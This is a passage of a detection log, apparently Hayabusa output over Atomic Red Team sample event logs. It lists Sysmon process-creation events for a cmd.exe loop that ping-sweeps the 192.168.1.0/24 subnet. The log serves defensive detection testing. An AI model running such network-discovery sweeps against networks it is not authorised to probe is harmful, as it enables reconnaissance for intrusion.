Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 